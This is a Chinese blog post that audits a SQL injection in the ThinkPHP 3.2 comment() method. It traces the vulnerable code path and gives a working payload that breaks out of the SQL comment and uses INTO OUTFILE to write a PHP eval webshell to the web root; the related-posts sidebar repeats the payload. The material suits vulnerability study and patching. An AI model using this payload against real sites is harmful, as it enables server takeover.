ThinkPHP3.2 comment 注释注入写shell

已于 2023-02-18 17:04:20 修改
阅读量1.6k 收藏
点赞数
分类专栏: php 代码审计 文章标签: php
于 2022-05-21 09:52:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/124894720
版权

comment

先看下comment的用法,用于在生成的SQL语句中添加注释内容,例如:

$this->comment('查询考试前十名分数')
->field('username,score')
->limit(10)
->order('score desc')
->select();

最终生成的SQL语句是:

SELECT username,score FROM think_score ORDER BY score desc LIMIT 10 /* 查询考试前十名分数 */

分析

走了一遍链发现跟之前的基本一样。

控制器

<?php
namespace Home\Controller;
use Think\Controller;

class IndexController extends Controller{
    public function index($id=''){
        highlight_file(__FILE__);
        $user = M('Users')->comment($id)->find(intval($id));
        var_dump($user);
    }
}

payload

?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*

M方法已经很熟悉了不跟进了,直接看comment(),没啥东西一个赋值
在这里插入图片描述
find(),前边的判断赋值语句之前看了很多遍了,不看了吧,直接跟进_parseOptions()
在这里插入图片描述

上边代码主要是插入了这几条数据,之后return $options;

再跟进select()

943行对$model赋值,944行对$bind赋值
在这里插入图片描述
跟进buildSelectSql

$options中没有page参数,所以没进if,跟进parseSql,注意$this->selectSql是传入的payload
在这里插入图片描述

由于使用的是comment()方法,所以直接跟进parseComment()
在这里插入图片描述
$comment是传入的payload,并将前后的/**/进行了闭合,最后就retrun了构造的sql语句,最后通过select()方法中的query()执行语句

将前后的/**/进行了闭合,最后就retrun了构造的sql语句,最后通过select()方法中的query()执行语句

链子跟的比较水,主要是东西主要还是前一篇的东西所以就没详细的分析

S1nJa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP v3.2 comment 注释注入 shell
qq_53263789的博客
02-09 321
漏洞详情 comment函数是用来进行查询注释功能,当执行sql语句时,搭配comment可能存在利用注释进行shell或者时间盲注 漏洞复现 控制器入demo $user = M('Users')->comment($id)->find(intval($id)); payload ?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/* 漏洞分析 首先
Php手工注入shell详细教程
04-18
Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入shell详细教程Php手工注入
THINKPHP5 getshell
公众号shadow sock7
12-11 7863
参考: https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/ ...
python3编ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
thinkPHP3.2使用RBAC实现权限管理的实现
10-16
主要介绍了thinkPHP3.2使用RBAC实现权限管理的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Ueditor for Thinkphp3.2
06-14
**Ueditor for Thinkphp3.2** 是一个集成百度Ueditor编辑器的Thinkphp3.2框架下的插件。这个插件使得在Thinkphp3.2的项目中,开发者能够轻松地引入强大的富文本编辑功能,为用户提供一个美观且功能丰富的在线文本...
腾讯云cos+阿里云oss+thinkphp3.2上传文件驱动
最新发布
01-15
1、框架版本:thinkphp3.2版本、thinkcmfX3.2 2、PHP版本:7.2.5以上,以下版本使用腾讯云官方对应版本的sdk自行替换 (https://cloud.tencent.com/document/product/436/12266) 3、后续会上传thinkphp5以上版本的...
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
《深入理解ThinkPHP3.2框架》 ThinkPHP,作为国内广泛应用的PHP开发框架,以其简洁、高效和易用性赢得了开发者们的喜爱。本篇将详细介绍ThinkPHP3.2版本,该版本在2013年12月31日进行了更新,其环境要求为PHP5.3及...
thinkphp3.2 webuploader较大视频文件分段上传方法demo
06-27
本示例主要讨论如何在ThinkPHP 3.2 框架下,结合Webuploader实现较大视频文件的分段上传,并在服务器端完成视频的合并。 首先,我们了解分段上传的基本原理。当上传的文件过大时,将其分割成多个小块(通常为几MB)...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
thinkphp5调用shell脚本_【ThinkPHP5】远程代码执行
weixin_39607710的博客
01-03 499
跟着小编一起动手操作吧!ThinkPHP5远程代码执行漏洞实验内容ThinkPHP是一个免费开源的快速、简单、面向对象的轻量级PHP开发框架,是为了敏捷Web应用开发和简化企业应用开发而诞生。ThinkPHP 5.0版本是一个颠覆和重构版本,采用全新的架构思想,引入了更多的PHP新特性,优化了核心,减少了依赖,实现了真正的惰性加载,支持composer,并针对API开发做了大量的优化。ThinkP...
网站后台shell方法总结
一小平民
03-18 1万+
今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全国,现在这种漏洞已经根柢斗劲难见到了,不扫除一些小网站模拟仍是存在此漏洞。在拿站历程中,我们凡是费了九牛两虎之力拿到办理员帐号和密码,并顺遂进入了后台,当然此时与拿到网站webshell还有一步之遥
一次thinkphp任意代码执行
3569
07-26 3423
开始找网站,thinkphp 的网站一找一大堆,可怕 ... 更可怕的是并不是你找到的就能任意命令执行,需要一个网站一个网站的测试 ... 然后我就一个一个的试 , 好可怜啊 , 试了十几个才有一个可以利用的 ...   原理:  有问题的代码: $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\
ThinkPHP3.2.3使用cli命令行模式
weixin_34061555的博客
03-16 415
if(version_compare(PHP_VERSION,'5.3.0','<'))die('require PHP > 5.3.0 !');//普通模式,解决官方分组不支持cli的问题$depr='/';$path= isset($_SERVER['argv'][1])?$_SERVER['argv'][1]:'';if(!empt...
ThinkPhp3.2.3缓存漏洞复现以及修复建议
飞鱼计划
04-18 9777
ThinkPhp3.2.3缓存漏洞复现以及修复建议 今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。 漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议 首先我们下载最新的thinkphp...
phpweb后台shell简单方法
sxf_123456的博客
04-24 5945
关于phpweb后台shell简单方法。   首先登录后台admin.php   登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。    代码文件如下:             然后选择你的马儿再上传   上传后如果为iis
使用基于ThinkPHP3.2.3的ThinkAdmin创建手机电脑通用的表白墙(九)后台实现:整体概述
珍惜时间
03-13 983
后台是需要登录使用的,除了登录页面之外,每个页面都要进行是否登录验证的,使用继承思想,建立一个BaseController.class.php让需要进行验证的Controller继承该类,判断用户是否登录的session Admin/Controller/BaseController.class.php <?php namespace Admin\Controller; use Think\C
ThinkPHP3.2完全开发手册
"ThinkPHP3.2完全开发手册,版本号V3.2.2,由上海顶想信息科技有限公司发布,遵循开放出版许可协议1.0。手册详细介绍了ThinkPHP3.2框架的使用和开发,包括MVC结构、面向对象、性能优化以及新特性,如命名空间支持和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值